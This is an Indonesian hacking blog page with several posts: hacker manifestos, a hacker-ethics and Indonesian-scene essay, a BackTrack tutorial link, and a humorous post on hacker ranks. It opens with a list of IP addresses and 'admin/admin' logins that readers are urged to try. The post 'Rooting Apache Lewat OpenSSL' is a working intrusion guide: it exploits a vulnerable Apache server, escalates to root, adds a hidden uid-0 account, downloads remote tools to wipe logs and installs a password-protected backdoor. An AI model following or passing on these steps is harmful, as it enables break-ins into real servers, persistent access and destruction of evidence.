180.247.130.16
180.247.130.17
180.247.130.18
180.247.130.19
180.247.130.20
lanjutkan terus sampek 100 itu hach aja wis
180.247.130.12
username :admin
passwordnya : admin
 Angry Angry Angry Angry Angry
Read More »

0 BackTrack & Metasploit Tutorial - 100% From Offensive Security

03.39 Under From deny saputra
[0 Comment]
Salam GEMPAR69

Banyak yang bertanya, dimana tempat belajar BackTrack!
Yang perlu anda ketahui adalah:
1. Harus bisa bahasa inggris, klo gak bisa ya harus jago nyari tools translator.
2. Harus sudah install backtrack biar bisa ujicoba
3. Harus sabar, teliti dan jeli dalam mencoba eksperimen

Kumpulan tutorialnya adalah:
    01 Introduction>
    02 Required Materials>
    03 Metasploit Fundamentals>
    04 Information Gathering>
    05 Vulnerability Scanning>
    06 Writing a Simple Fuzzer>
    07 Exploit Development>
    08 Client Side Exploits>
    09 MSF Post Exploitation>
    10 Meterpreter Scripting>
    11 Maintaining Access>
    12 MSF Extended Usage>
    13 Beyond Metasploit>
    14 Module Reference>
    15 About the Authors

Langsung aja linknya disini TKP
Read More »

Sabtu, 17 September 2011

0 Manifesto Sang Hacker

05.21 Under From deny saputra
[0 Comment]

Manifesto ini ditulis oleh The Mentora.k.a Loyd Blankenship, salah satu Hacker legendaris, setelah dia tertangkap. Isinya bagus sebagai motifasi dan membuka pikiran. Hingga kini, manifesto yang ditulis pada tahun 1986 ini masih valid dengan kondisi sekarang. Silahkan dibaca dan diresapi :)

MANIFESTO

Ini adalah dunia kami sekarang… dunia elektron dan sambungan, keindahan sang ‘baud’. Kami menggunakan layanan yang sudah tersedia tanpa membayar harga yang seharusnya betul-betul murah jikasaja layanan tersebut tidak dijalankan oleh orang-orang rakus yang mencari untung, dan kalian menyebut kami penjahat. Kami menjelajah… dan kalian menyebut kami penjahat. Kami mengejar pengetahuan… dan kalian menyebut kami penjahat. Kami ada tanpa perbedaan warna kulit, tanpa perbedaan kebangsaan, tanpa prasangka keagamaan … dan kalian sebut kami penjahat.
Kalian membuat bom, kalian berperang, kalian membunuh, mencurang, dan berbohong kepada kami sambil berusaha meyakinkan kami bahwa ini adalah untuk kebaikan semua, namun kamilah yang jahat.
Ya, aku adalah seorang kriminal.
“Kejahatanku adalah rasa keingintahuanku. Kejahatanku adalah menilai seseorang dari perkataan dan perbuatannya, bukan dari penampilannya. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan.”
Aku adalah seorang Hacker, dan ini adalah manifestoku. Kalian bisa saja menghentikanku, namun kalian tak mungkin menghentikan kami semua …
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Another one got caught today, it’s all over the papers. “Teenager Arrested in Computer Crime Scandal”, “Hacker Arrested after Bank Tampering”…
Damn kids. They’re all alike.
But did you, in your three-piece psychology and 1950′s technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world…
Mine is a world that begins with school… I’m smarter than most of the other kids, this crap they teach us bores me…
Damn underachiever. They’re all alike.
I’m in junior high or high school. I’ve listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. “No, Ms. Smith, I didn’t show my work. I did it in my head…”
Damn kid. Probably copied it. They’re all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up.
Not because it doesn’t like me…
Or feels threatened by me…
Or thinks I’m a smart ass…
Or doesn’t like teaching and shouldn’t be here…
Damn kid. All he does is play games. They’re all alike.
And then it happened… a door opened to a world… rushing through the phone line like heroin through an addict’s veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought… a board is found.
“This is it… this is where I belong…”
I know everyone here… even if I’ve never met them, never talked to them, may never hear from them again… I know you all…
Damn kid. Tying up the phone line again. They’re all alike…
You bet your ass we’re all alike… we’ve been spoon-fed baby food at school when we hungered for steak… the bits of meat that you did let slip through were pre-chewed and tasteless. We’ve been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert.
This is our world now… the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn’t run by profiteering gluttons, and you call us criminals. We explore… and you call us criminals. We seek after knowledge… and you call us criminals. We exist without skin color, without nationality, without religious bias… and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a hacker, and this is my manifesto. You may stop this individual, but you can’t stop us all… after all, we’re all alike.
+++The Mentor+++


//E.O.F
Read More »

0 Hacker – ALL ABOUT

05.21 Under From deny saputra
[0 Comment]

Hacker atau Cracker?

Jangan dulu punya anggapan buruk dengan yang namanya Hacker, karena anda mesti tahu seperti apa Hacker sejati itu. Masalahnya, ada sekelompok orang yang menyebut-nyebut dirinya sebagai Hacker padahal mereka itu adalah seorang Cracker. Hacker sejati sebenarnya tidak sejahat (atau bahkan tidak jahat sama sekali) seperti yang kebanyakan dipikirkan orang. Hacker adalah sekumpulan atau beberapa kelompok yang bertujuan untuk mengembangkan ilmu pengengetahuan dan sharing informasi bebas tanpa batas. Hacker adalah seseorang yang tertarik  untuk mengetahui  secara mendalam  mengenai kerja suatu system,komputer, atau jaringan komputer. Mereka terdiri dari para programer yang ahli jaringan. Mereka jugalah yang berjasa membangun Internet lewat pengembangan sistem operasi UNIX.
Istilah Hacker sendiri lahir sekitar tahun 1959 dari MIT(Massacusetts Institute of Technology), sebuah universitas di Amerika yang  terdiri dari orang-orang cerdas namun cenderung tidak mempercayai adanya Tuhan (Atheis). Saat itulah semua berawal, dari sebuah ruangan baru, “EAM room” pada Building 26 MIT, sebuah tempat yang merupakan nenek moyang dari “dunia baru” yang kini kita kenal, tempat nenek moyang sebuah mesin yang kini kita sebut sebagai “komputer”, mesin yang mampu membawa kita menuju kelebihbaikan dengan kebebasan informasi, dunia para Hacker sejati.
Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu. Mereka selalu berbagi informasi, memberi jawaban serta berlomba-lomba untuk berbuat yang terbaik agar dihormati di lingkungannya. Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu berulang-ulang dan membosankan. Mereka berpedoman pada kata-kata bijak :
Untuk mengikuti jalan – pandanglah sang ahli – ikuti sang ahli – berjalan bersama sang ahli – kenali sang ahli -jadilah sang ahli
Sementara itu, para cracker sibuk untuk memuaskan diri mereka dengan aktivitas Cracking. mulai dari membobol komputer, menebar virus (tanpa tujuan – beberapa Hacker sejati ada yang menulis virus namun dengan tujuan yang jelas), hingga mengakali telepon (Phreaking). Para Hacker menyebut mereka sebagai orang malas yang tidak bertanggung jawab. Jadi, sangat tidak adil jika kita tetap menganggap bahwa Hacker itu jahat dan menakutkan karena sangat jelas bahwa Hacker bersifat membangun sementara Cracker bersifat membongkar.
Ingin jadi seorang Hacker?? Tidak ada kata sulit bagi mereka yang mau belajar. Untuk menjadi seorang Hacker anda harus menguasai beberapa bahasa pemrograman dan tentu saja sikap-sikap yang bisa membuat anda diterima di lingkungan mereka. Biasanya calon Hacker memulai dengan belajar bahasa [Python] karena bahasa ini tergolong bahasa pemrograman yang termudah. Bahasan mengenai bahasa ini bisa anda lihat di www.python.org. Setelah itu anda juga harus menguasai [java] yang sedikit lebih sulit akan tetapi menghasilkan kode yang lebih cepat dari Python, [C], [C++] yang menjadi inti dari UNIX, dan [Perl] (www.perl.com ) serta [LISP] untuk tingkat lanjut.
Setelah menguasai semua kemampuan dasar diatas, calon Hacker disarankan untuk membuka salah sati versi UNIX open-source atau mempelajari LINUX, membaca kodenya, memodifikasi dan menjalankannya kembali. Jika mengalami kesulitan, disarankan untuk berkomunikasi dengan club pengguna Linux [ www.linpeople.org]

Manifesto Sang Hacker

It happened again today. Another one sold out, sacrificing their dreams to the corporate security machine.
Damn whitehats, noone believes in a cause anymore.
Another bug was released today to the security mailing lists.
Damn Whitehats, they know not what they do.
Another potential computer genius was relegated to an existence of nothing more than a 9-5 cubicle-dwelling promotional tool.
Damn whitehats, putting money before discovery.
Another family was ravaged by cooperations and governments bent on instituting control over individuality, monitoring every action..
Another kid was sentenced today for searching for a way to understand the world. Convicted and imprisoned, not because of what he did, but because of what others thought he could do.
Damn Whitehats – Fear keeps them in business.
The public, believing anything it hears from “reputed experts”. Screaming for blood. Looking for something to blame for their lost hope. Their lost ability to seek out new knowledge. Fear consumes them. They cannot let go of their uncertainty and doubt because there is no meaning. They seek to destroy explorers, outlaws, curiosity seekers because they are told too. They are told these people that seek information are evil. Individuality is evil. Judgment should be made based upon a moral standard set in conformity rather than resistance. Lives are ruined in the name of corporate profit and information is hoarded as a commodity.
Damn Whitehats, you were once like us.
I was a Whitehat. I had an awakening. I saw the security industry for what is really is. I saw the corruption, the lies, the deceit, the extortion of protection money in the form of subscription services and snake-oil security consultants.
I wanted to know, I wanted to understand, I wanted to go further then the rest. I never want to be held down by contracts and agreements.
You say I should grow up. You say I should find better things to do with my time. You say I should put my talent to better use. You’re saying I should fall in line with the other zombies and forget everything I believe in and shun those with my drive, my curiosity, tell them it’s not worth it, deny them of the greatest journey they will ever experience in their lives.
I am not a blackhat. The term is insulting, it implies I am the opposite of you. You think i seek to defeat security, when I seek something greater. I will write exploits, travel through networks, explore where you are afraid to go. I will not put myself in the spotlight and release destructive tools to the public to attract business. I will not feed the fear and hysteria created by the security industry to increase stock prices. I can, and will, code and hack and find out everything I can for the same reasons I did years ago.
I am a Hacker, dont try to understand me, you lost all hope of that when you crossed the line. You fail to see the lies and utter simplicity behind the computer security industry. Once, you may have shared my ideals. You fail to see the fact that security is a maintenance job.
Youve given up hope for something better. You fail to see yourself as worthless, fueling an industry whose cumulative result is nothing. I dont hate you, I dont even really care about you – If you try to stop me, you will fail, because I do this out of love — you do it for money.
This is our world now.. the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheap if it wasn’t run by profiteering gluttons, and you call us criminals. We explore… and you call us criminals. We seek after knowledge… and you call us criminals. We exist without skin color, without nationality, without religious bias… and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat and lie to us and try to make us belive it is for our own good, yet we’re the ciminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a Hacker, and this is my manifesto. You can’t stop me, and you certainly can’t stop us all.

Etika Hacker

  • Akses ke komputer-komputer – dan segala sesuatu yang berpotensi untuk mengajarmu mengenai dunia ini haruslah bebas dan total. Semua informasi haruslah tersedia secara bebas / cuma-cuma.
  • Jangan percaya otoriter/kemapanan – dukung desentralisasi.
  • Hackers haruslah dinilai berdasarkan kemampuan hackingnya – bukannya berdasar kriteria seperti derajat, umur, ras, atau posisi. Anda bisa berkarya seni dan keindahan melalui komputer. Komputer dapat merubah hidupmu menuju kelebih baikan.
  • Sedangkan dalam prakteknya, Etika Hacker diatas (prinsip) dipraktekkan dengan mengikuti kode etik:
  • Jangan merusak sistem manapun secara sengaja. (rmrf hard disk, crash, overflow, dll. Mengubah tampilan index.html sebuah website sah-sah saja asalkan file aslinya disimpan di sistem yang sama dan bisa diakses oleh administrator.)
  • Jangan mengubah file-file sistem selain yang diperlukan untuk mengamankan identitas anda.
  • Jangan meninggalkan nama asli anda (maupun orang lain), handle asli, maupun nomor telepon asli di sistem apapun yang anda akses secara ilegal. Mereka bisa dan akan melacak anda dari handle anda.
  • Berhati-hatilah dalam berbagi informasi sensitif. Pemerintah akan menjadi semakin pintar. Secara umum, jika anda tidak mengenal siapa sebenarnya lawan bicara/chatmu, berhati-hatilah!
  • Jangan memulai dengan mentargetkan komputer-komputer milik pemerintah. Ya, ada banyak sistem milik pemerintah yang cukup aman untuk di-hack, namun resikonya lebih besar dari keuntungannya. Ingat, pemerintah punya dana yang tak terbatas dibanding dengan ISP/Perusahaan yang objektifnya adalah untuk mencari profit..

Tingkatan-tingkatan Dalam Dunia Hacker

Elite :
Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup  mengkonfigurasi &  menyambungkan  jaringan  secara  global. Sanggup melakukan pemrogramman setiap harinya. Sebuah  anugrah  yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti  siluman  dapat  memasuki  sistem  tanpa  di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena  mereka  selalu mengikuti peraturan yang ada.
Semi Elite:
Hacker ini biasanya lebih mudadaripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecilprogram cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh  para Elite  mereka  sering  kali  di kategorikan Lamer.
Developed Kiddie:
Sebutan ini terutamakarena umur kelompok ini masih muda (ABG)&masih sekolah. Mereka membaca tentang metoda hacking &  caranya  di  berbagai   kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil  &  memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
Script Kiddie:
Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas.  Seperti juga Lamers, mereka hanya mempunyai  pengetahuan  teknis  networking yang sangat minimal. Biasanya tidak lepas   dari   GUI.  Hacking   dilakukan menggunakan trojan untuk   menakuti &  menyusahkan  hidup  sebagian pengguna Internet.
Lamer:
Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar   tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit.   Biasanya    melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya  menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya  untuk   mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed  kiddie   atau  script kiddie saja.

Hacking Scene di indonesia

Pada era 80-an hingga 1994, lahirlah para Hacker Indonesia yang boleh dibilang masih “ASLI”. Pada umumnya mereka lahir secara otodidak dan secara kebetulan memiliki akses jaringan. Biasanya terdiri dari para pegawai perusahaan-perusahaan besar atau instansi-instansi pemerintah. Mereka ini terdiri dari orang-orang yang berkecimpung di bidang UNIX, VAX/VMS, dan tentu saja ahli jaringan.
Ketika Internet mulai marak di Indonesia, mulailah masyarakat begitu antusias mempelajari komputer terutama network security. Jika dulunya tidak ada aktivitas yang bersifat merusak, kini perlahan hal itu mulai berubah. Remaja-remaja ABG mulai “berterbangan” di Internet, mencari tutorial-tutorial baru, mencari pengetahuan-pengetahuan komputer yang tidak mereka dapatkan di sekolah. Mereka menjadi semakin pintar, bahkan melebihi guru-guru di sekolah mereka.
Namun layaknya seorang ABG, sebagian besar dari mereka jiwanya masih labil. Pengetahuan mereka masih sangat minim dan memiliki semangat tinggi untuk merusak. Mereka masih belum mengerti arti “Hack” yang sebenarnya. Mereka dengan sombong dan tidak tau malu menyebut diri mereka Hacker hanya karena berhasil mengakali Billing, menjalankan email BOMB, menjalankan exploit-exploit. Padahal mereka sama sekali tidak tau bagaimana tool yang mereka gunakan itu sendiri bekerja. Mereka tidak mengenal sang system, namun dengan sombong mereka menyebut dirinya Hacker. Tanpa tau apa itu TCP/IP, namun dengan banga menyebut dirinya Hacker. Padahal para Hacker sejati Indonesia yang kemampuannya sudah setara dengan para wizard di Amerika dengan tegas menolak dirinya disebut Hacker lantaran masih selalu merasa ilmu yang dimilikinya belum cukup. Yeah, inilah Hacking Scene (pangung perhackingan) di Indonesia yang cukup menyedihkan ^_^ namun bisa juga diangap wajar dan manusiawi :)
Akan tetapi tidak semua dari mereka yang hanya bermulut besar. Tentu saja pasti ada diantaranya yang benar-benar memiliki kemampuan walaupun jumlahnya sedikit. Mereka yang sedikit ini kemudian banyak yang mengadakan pertemuan-pertemuan baik secara sengaja maupun tidak sengaja. Mereka tetap berexplorasi dan mencari pengetahuan, beraktivitas seperti biasa di lingkungannya tanpa menimbulkan kecurigaan atau prasangka dari masyarakat sekitarnya.
Dari pertemuan-pertemuan yang dilakukan, mulailah bermunculan organisasi-organisasi Hacker dan Cracker. Diantaranya yang cukup ternama ialah: AntiHackerlink (sudah tidak kedengaran lagi keberadaannya), Crack Sky (biasa juga dikenal sebagai Cracker Society, sebuah organisasi Underground yang berpusat di Surabaya), Kecoak Elektronik, ECHO, Jasakom Community, IndoHack, Secreet Colony, dan masih banyak lagi. Pada umumnya setiap daerah memiliki organisasi-organisasi sendiri dan nama organisasi disesuaikan dengan daerah asal mereka. Misalnya untuk komunitas Hacker Batam biasa menyebut dirinya Batam Hacker, untuk daerah malang biasa menyebut dirinya MalangHackerlink, dan lain sebagainya.
Aktivitas-aktivitas yang kini mereka lakukan cukup beragam. Pada umumnya ialah memoderasi forum-forum dan milis besar, menjadi OP di IRC-IRC Channel ternama, saling berbagi pengetahuan dengan menulis tutorial-tutorial, Artikel, Advisories seputar bugs-bugs baru beserta cara pencegahannya, mengadakan seminar-seminar tentang Network Security, menulis program open-source, serta melakukan berbagai aktivitas “Hack” sebagai sarana pemenuhan kebutuhan untuk berexplorasi.
Pada umumnya para Hacker peka terhadap keadaan lingkungannya. Anggapan bahwa mereka adalah orang-orang yang individualis dan egois tampaknya harus segera dihapuskan. Hal ini telah lama terbukti, anda bisa menyaksikan sendiri bagaimana pertarungan para Hacker Indonesia dengan Hacker-Hacker Malaysia saat negara itu ingin merampas Ambalat dari Indonesia. Atau perseteruan Hacker Indonesia melawan Hacker-Hacker dari Australia saat mereka mengusik Indonesia. Inilah cara berbeda para Hacker dalam mempertahankan negaranya, bukan dengan senjata, bukan dengan kekerasan, namun dengan ilmu pengetahuan.
———-
Creditz:
z i n e  [k - e l e k t r o n i k]
[e c h o]  z i n e # 2
[p h r a c k]  m a g a z i n e
———-
STAY ALERT!! KEEP LEARNING  AND HAPPY HACKING!!

//E.O.F
Read More »

0 Rooting Apache Lewat OpenSSL

05.20 Under From deny saputra
[0 Comment]

  1. Download Apache Chunked Scanner
  2. Download putty.exe
  3. Scanning for IP range menggunakan Apache Chunked Scanner
  4. Dapet target buka putty
  5. login ke shell account lewat ssh <— untuk user windows harus punya shell account di suatu server yang pakai linux langsung aja ke langkah 6 dan ngga perlu putty
  6. Download openSSL source code ke shell account kita dengan perintah ‘wget www.tempat-download.com/openssl-too-open.tar.gz’
  7. ekstrak file dengan perintah ‘tar -zxvf openssl-too-open.tar.gz’
  8. masuk ke direktorinya dengan mengetikan ‘cd openssl-too-open’
  9. ketik ‘make’ lalu ketik ‘chmod +x openssl’
  10. ketik ‘./openssl-too-open’ akan terlihat jenis2 server yang bisa di rooting
  11. target Scanning dari Apache Chunked Scanner anggap saja
    IP : 203.10.10.10
    Apache : Apache 1.3.23
    OS Linux : RedHat 7.3
    Maka ketikan ‘./openssl-too-open -a 0x0b -v 203.10.10.10′
  12. Mulai local xploit ketik ‘mkdir /var/tmp’ lalu masuk ke dir ketik ‘cd /var/tmp’
  13. Ketik ‘wget www.tempat-download.com/local.tar.gz’
  14. Ketik ‘tar xzf local.tar.gz’
  15. Ketik ‘cd local’
  16. Ketik ‘./lconfex -p’ akan diinformasikan shellcode, padstring, dan magic-number
  17. Buat direktori ‘segfault.eng’ dengan file ‘segfault.eng’ lalu command touch dan kemudian commad ‘./lconfex -s (shellcode) -m (padstring) -r (magic-number)
    untuk perintahnya:
    ‘mkdir segfault.eng ; touch segfault.eng/segfault.eng’
    ‘./lconfex -s (shellcode) -m (pandstring) -r (magic-number)’
    untuk perintah diatas masalah shellcode, padstring, magic-number kamu pasti tau setelah perintah 17 dijalankan.
  18. Ketik ‘id’ klo muncul —> root uid=0(root) gid=48(apache) groups=48(apache),89(sympa) <— anda adalah root

Tahap adduser, pembersihan log, backdoor


  1. ketik ‘/usr/sbin/useradd vr -u 0 -o -g root -s /bin/bash -d /dev/.vr passwd -d vr <— add user root nama vr
    /usr/sbin/useradd vr <— menambahkan login user nama vr
    root <— akses root
    /bin/bash -d /dev/.vr <— create dir vr
    passwd -d vr <— password vr
    * catatan : login, direktori dan password harus sama
  2. Buka new session pakek putty dan mulai login ke target
  3. Ketik ‘lastlog | grep vr’
  4. Download tools untuk menghapus jejak kita ketik ‘wget www.tempat-download.com/remove.c’
  5. compile file tersebut ketik ‘gcc -o r remove.c DGENERIC’
  6. hapus log user vr ketik ‘./remove vr’
  7. Install backdoor ketik ‘wget www.alamat-download.com/backdoor.tar.gz’
  8. ketik ‘tar xzf backdoor.tar.gz’
  9. Ketik ‘cd shv4′
  10. Ketik ‘./setup n3rd 6969′ —> n3rd = password login backdoor 6969 = port backdoor
  11. menghapus semua kemungkinan mengarah ke kita ; user dan direktori yang kita buat ketik ‘/usr/sbin/userdel -r vr’
  12. BERES… silahkan login ke shell dengan port 6969 dengan password n3rd pada target :p
Jangan diacak2 ya targetnya karena semua ini untuk pengetahuan segala bentuk penyalahgunaan bukan tanggung jawab saya.
VR-X69 (NERD)

//E.O.F
Read More »

0 Jalan Singkat Untuk menjadi Developed Kiddie

05.19 Under From deny saputra
[0 Comment]

Engkau datang ke chenel Hacker, kemudian katakan kalau kamu adalah Hacker dan sudah berada pada posisi Developed Kiddie. Engkau akan berbicara banyak dengan mereka, tapi INGAT, tetap katakan APA ADANYA dan JANGAN SOK TAU… lebih baik katakan TIDAK TAU jika memang engkau tidak tau. Kalau kamu sok tau dan SALAH… kiamat, mereka akan nenempatkanmu pada posisi LAMER dan ini akan membuatmu sedih (tidak? tidak membuatmu sedih? ou… itu malapetaka sobat, sedihlah kalau kamu disebut Lamer… tidak bisa? ayoo… lah teman, setidaknya berpura-pura lah…)
Pada mulanya mereka akan sedikit bingung, mengapa engkau lama dalam menjawab pertanyaan mereka? dan biarkan itu terjadi (jangan memaksakan mengetik cepat apalagi hingga salah ketik… memalukan). Mereka akan menganggap kalau kamu terlalu sibuk karena sedang mengexplorasi sebuah sistem operasi atau sedang mencoba untuk mengutak-atik jaringan. Tapi ingat, jangan mengatakan kalau kamu baru belajar mengetik, sedang mengexplorasi keyboard, maupun mencoba untuk mengutak-atik fungsi-fungsi di IRC. Biarkan mereka berimajinasi terlebih dahulu.
Yakinlah kalau mereka akan mencobaimu untuk mengetahui kemampuanmu. Ingat sekali lagi dan seumur hidupmu, KATAKAN APA ADANYA & JANGAN SOK TAU. Cobalah terlebih dahulu untuk memastikan kalau sesuatu itu benar-benar berfungsi atau carilah manualnya untuk memastikan kalau memang begitu adanya. Jika kamu telah di CAP sebagai SOK TAU, maka walaupun kamu memberikan informasi yang benar (terjadi pada sistemmu) tetapi tidak begitu pada sistem mereka, maka mereka akan menganggap kalau kamu sok tau lagi. Padahal ini adalah sesuatu yang hebat jika kamu memang menemukan sesuatu yang aneh atau bahkan yang luar biasa.
Waktu terus berlanjut hingga mereka akhirnya mengambil kesimpulan kalau kamu sebenarnya baru belajar mengetik. Hem? Dari mana mereka tau? Ya, karena kamu cepat sekali dalam mengateikkan “ha ha ha ha”, kemudian lambat dalam mengetikkan “hanya lelucon…”, kemudian cepat lagi dalam mengetikkan “ha ha ha ha”…
Saat mereka sudah merasa sangat yakin, secara tiba-tiba…, semua user di chenel mengetikkan “Kamu LAMER!!!”… BERSAMA-SAMA (bahkan ada yang mengulanginya sampai berkali-kali), hingga layar monitormu dipenuhi oleh tulisan tersebut DARI ATAS KE BAWAH… dan kamu jangan hanya bersedih dalam situasi seperti ini… kamu HARUS MENANGIS!!! sambil meneriakkan kata “TIDAKKKK….”.
Kamu salah? Menerutku tidak… Mangapa? Karena aku juga belum lebih dari itu dan aku memiliki beberapa tips untuk meyakinkan mereka kalau orang seperti kita sudah bisa langsung menduduki poasi Developed Kiddie… ya, semenjak kita dilahirkan (yang pasti, sebelum belajar mengetik)… Ikuti point-point berikut dan jangan dihapalkan! karena akupun tidak hapal (walaupun ini merupakan salah satu moto hidupku), masih banyak yang harus dijejeli ke dalam otakmu (baik memori maupun logika) karena Hacking itu LUUUASSS…
Point 1:
Saya bukan Lamer atau Wanna-be Hacker!, karena saya adalah Hacker semenjak sperma dan ovum menyatu dan “DILAHIRKAN untuk MENJADI Elite (31337)”.
Point 2:
Katakan pada mereka kalau kamu tidak akan menjadi Script Kiddie karena kamu akan membiarkan perbuatan untuk orang-orang BODOH itu (perbuatan yang merusak dan menyusahkan orang lain), tetap disebut CRACKER (ingat kamu adalah HACKER).
Point 3:
Kini tanyakan pada mereka, di mana posisi mu… Semi Elite? oho… jika kamu bahkan belum menguasai benar suatu sistem operasi atau turut mengembangkan sistem operasi yang open source (seperti GNU/Linux, BSD, dll), jangan katakan kalau kamu Semi Elite! Mereka akan membuat HUDUPMU MENDERITA…!!!
Point 4:
Jadi posisimu di Elite? Jangan teman…, kalau Semi Elite pun tidak, jangan berani menyebutkan atau bahkan menyindir mengenai yang satu ini!!! bahkan variannya (31337). Mereka akan membuat HIDUP DAN MATIMU MENDERITA…!!!
Pont 5:
Tanyakan pada mereka, di mana posisi mu (atau kita)? He..he..he.. hanya tinggal satu posisi pada hirarki Hacker, yaitu “Developed Kiddie”. Nama yang cukup bagus bukan? Tepat di tengah hirarki dan ini akan menjadi “titik aman” yang paling sempurna.
Point 6:
Ingat pertahankan Point 1 dengan nyawamu… atau mereka akan menempatkan mu di sana (tepatnya yang akan membuatmu SEDIH).
Pada saat pertama aku menulis ini, aku masih sangat baru di dunia yang sangat mengasyikkan ini dan aku yakin kalau aku akan tetap bertahan di sini. Dua bulan lagi adalah hari ulang tahun web-site ku yang pertama (www.l411v.com). Semoga web-site ini tetap ada hingga kamu membaca tulisan ini. Tujuan utamanya adalah sebagai PINTU GERBANG lain agar orang-orang seperti ku (atau kita) dapat semakin mudah dalam menemukan jalan pulang. Gerbang ini ku bangun pada bulan Juli 2004.
Dari pengalaman ku yang minim, aku akan mecoba memberikan beberapa tips dari apa yang telah aku lalui selama ini;
  • Yang pasti BELAJAR… terus BELAJAR… dan tetap BELAJAR… Pelajari buku-buku bagus (kunjungi HACK-FAQ (www.hackfaq.org), mereka akan menunjukkan kepadamu beberapa buku dan site yang bagus).
  • Pelajari dasar-dasarnya dari Hack FAQ (www.hackfaq.org) dan cari menggunakan search engine seperti Google (www.google.com) menggunakan kata kunci ‘alt’.
  • Pelajari:
    • Sistem operasi *nix – Linux, BSD Cari saja yang gratis dan install pada komputermu.
    • Bahasa pemrograman – Assembly, C/C++, Perl, Shell(BASH), Java Kebanyakan pengembangan Open Source akan menggunakan bahasa C. Pelajari buku ini: Kernighan, Brian; Ritchie, Dennis. (1988). The C programming Language. Prentice-Hall. Banyak yang menyebut mereka dengan K&R.
    • Sitem jaringan/telekomunikasi/internet ini akan sangat luas ruang lingkupnya, tapi yang paling MENGGAIRAHKAN… HACKER HAUS AKAN INFORMASI dan inilah yang akan melegakannya…
    • Sekurity “I know the rules and than I know how to break them” – Air Supply Pelajari sebuah sitem dan temukan kelemahannya. Kemudian, beritahukan kepada yang bertanggung jawab atas sistem tersebut beserta cara mengatasinya (jika kamu tau)… Setelah sistem tersebut diperbaiki, barulah dipublish… Sudah terlambat? BELUM!, jika kamu hanya menginginkan hal tersebut untuk dijadikan pengalaman berharga dalam merancang sitem-sistem berikutnya.
    • Beli CD-CD Hacker (terdapat beberapa tutorial, E-Zine dan bahkan source code). CD-CD Hacker akan menyediakan beberapa program-program yang dapat digunakan untuk merusak. JANGAN PERNAH MERUSAK!!! Gunakan untuk kebaikan dan yang paling penting adalah pelajari bagai mana cara kerja program-program tersebut.
    • Nongkrong di chanel, mailing list, dan sering-seringlah main ke forum. Hacker memiliki komunitas yang hebat dan bergabunglah dengan mereka. JANGAN HANYA BERTANYA! Berusahalan untuk membantu orang lain jika kamu mengetahui jawabannya atau bahkan, luangkanlah waktu untuk mencobanya kembali atau membuka buku-bukumu jika kamu belum benar-benar yakin. Jangan membayar usaha mereka dalam menolongmu dengan uang, pujian, jabatan, atau bahkan mengatakan salut pada mereka. Bayarlah mereka dengan cara melakukan apa yang mereka lakukan kepadamu.
  • Join pengambangan Open Source dan Open Core. Seorang Hacker akan mati tanpa ini…
-= Keep Learning and Happy Hacking =-
==========================================================
EOF-l411v

//E.O.F
Read More »